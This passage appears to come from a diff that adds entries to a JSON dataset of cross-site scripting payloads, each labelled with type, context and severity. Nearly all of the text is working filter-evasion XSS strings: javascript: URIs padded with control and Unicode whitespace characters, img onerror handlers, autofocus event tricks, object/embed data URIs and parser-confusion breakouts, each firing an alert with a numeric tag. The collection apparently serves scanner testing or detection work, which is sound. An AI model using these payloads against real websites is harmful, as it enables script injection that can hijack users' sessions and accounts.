"<a href=\"\\x08javascript:javascript:alert(6145)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(5741)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(0687)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(3574)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x12javascript:javascript:alert(4586)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x0Djavascript:javascript:alert(9402)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x0Ajavascript:javascript:alert(3231)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x0Cjavascript:javascript:alert(7355)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x15javascript:javascript:alert(0205)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(9925)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x16javascript:javascript:alert(8897)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x02javascript:javascript:alert(6372)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x1Bjavascript:javascript:alert(8229)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x06javascript:javascript:alert(4589)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(9596)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(9704)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x1Ejavascript:javascript:alert(2026)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(9321)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"\\x1Cjavascript:javascript:alert(3943)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript\\x00:javascript:alert(0153)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript\\x3A:javascript:alert(1439)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript\\x09:javascript:alert(1397)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript\\x0D:javascript:alert(0179)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript\\x0A:javascript:alert(4517)\" id=\"fuzzelement1\">test</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(6124)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x22onerror=javascript:alert(6701)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(5601)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(3902)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(2873)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x09onerror=javascript:alert(5013)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(7465)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x00onerror=javascript:alert(3730)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x27onerror=javascript:alert(9088)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x \\x20onerror=javascript:alert(4409)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x3Bjavascript:alert(0882)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x0Djavascript:alert(7364)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(8282)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x81javascript:alert(3913)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x84javascript:alert(6947)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE3\\x80\\x80javascript:alert(4334)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x09javascript:alert(9043)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x89javascript:alert(8844)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x85javascript:alert(6524)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x88javascript:alert(8107)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x00javascript:alert(5358)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\xA8javascript:alert(6025)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(6406)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE1\\x9A\\x80javascript:alert(9116)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x0Cjavascript:alert(4925)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x2Bjavascript:alert(1170)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(5118)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>-javascript:alert(8887)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x0Ajavascript:alert(2855)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(6931)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x7Ejavascript:alert(1992)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x87javascript:alert(7616)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1456)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\xA9javascript:alert(5364)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xC2\\x85javascript:alert(8562)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(9603)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x83javascript:alert(4045)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(0166)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(5381)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x80javascript:alert(9348)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x21javascript:alert(0701)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x82javascript:alert(5360)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE2\\x80\\x86javascript:alert(0793)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(6168)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x0Bjavascript:alert(0186)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\x20javascript:alert(6753)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"`'><script>\\xC2\\xA0javascript:alert(2552)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x0Bjavascript:alert(2193)\\x0Bsrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x22javascript:alert(0795)\\x22src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x09javascript:alert(7428)\\x09src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x27javascript:alert(5226)\\x27src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x0Ajavascript:alert(2341)\\x0Asrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x0Cjavascript:alert(2770)\\x0Csrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x0Djavascript:alert(6181)\\x0Dsrc=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x60javascript:alert(5677)\\x60src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\"/><img/onerror=\\x20javascript:alert(1485)\\x20src=xxx:x />", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x2F>javascript:alert(5324)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x20>javascript:alert(8352)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0D>javascript:alert(7531)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0A>javascript:alert(1566)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0C>javascript:alert(0755)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x00>javascript:alert(2828)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x09>javascript:alert(9102)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0B=javascript:alert(1048)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x00=javascript:alert(5801)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0C=javascript:alert(3988)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0D=javascript:alert(2142)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x20=javascript:alert(7012)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x0A=javascript:alert(2357)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "`\"'><img src=xxx:x onerror\\x09=javascript:alert(2723)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>javascript:alert(4696)<\\x00/script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=# onerror\\x3D\"javascript:alert(7835)\" >", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<input onfocus=javascript:alert(1454) autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<input onblur=javascript:alert(9642) autofocus><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<video poster=javascript:javascript:alert(2628)//", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onscroll=javascript:alert(6640)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form id=test onforminput=javascript:alert(8938)><input></form><button form=test onformchange=javascript:alert(8938)>X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<video><source onerror=\"javascript:javascript:alert(2061)\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<video onerror=\"javascript:javascript:alert(7355)\"><source>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form><button formaction=\"javascript:javascript:alert(9903)\">X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body oninput=javascript:alert(5675)><input autofocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<math href=\"javascript:javascript:alert(3956)\">CLICKME</math> <math> <maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:javascript:alert(3956)\">CLICKME</maction> </math>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<frameset onload=javascript:alert(9194)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<table background=\"javascript:javascript:alert(7733)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<!--<img src=\"--><img src=x onerror=javascript:alert(0778)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<comment><img src=\"</comment><img src=x onerror=javascript:alert(4501))//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<![><img src=\"]><img src=x onerror=javascript:alert(0013)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style><img src=\"</style><img src=x onerror=javascript:alert(4204)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<li style=list-style:url() onerror=javascript:alert(3719)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(3719)></div>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<head><base href=\"javascript://\"></head><body><a href=\"/. /,javascript:alert(2226)//#\">XXX</a></body>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(8969)</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(4400)\"></OBJECT>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object data=\"data:text/html;base64,%(base64)s\">", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed src=\"data:text/html;base64,%(base64)s\">", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<b <script>alert(0618)</script>0", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div id=\"div1\"><input value=\"``onmouseover=javascript:alert(9601)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<x '=\"foo\"><x foo='><img src=x onerror=javascript:alert(9786)//'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed src=\"javascript:alert(6826)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=\"javascript:alert(9323)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<image src=\"javascript:alert(7942)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"javascript:alert(4728)\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=width:1px;filter:glow onfilterchange=javascript:alert(6218)>x", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<? foo=\"><script>javascript:alert(1353)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<! foo=\"><script>javascript:alert(4032)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "</ foo=\"><script>javascript:alert(6163)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<? foo=\"><x foo='?><script>javascript:alert(9281)</script>'>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>javascript:alert(6545)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<% foo><x foo=\"%><script>javascript:alert(3994)</script>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div id=d><x xmlns=\"><iframe onload=javascript:alert(9973)\"></div> <script>d.innerHTML=d.innerHTML</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x00src=x onerror=\"alert(9919)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x47src=x onerror=\"javascript:alert(9314)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x11src=x onerror=\"javascript:alert(7333)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img \\x12src=x onerror=\"javascript:alert(0960)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img\\x47src=x onerror=\"javascript:alert(7746)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img\\x10src=x onerror=\"javascript:alert(4586)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img\\x13src=x onerror=\"javascript:alert(6931)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": 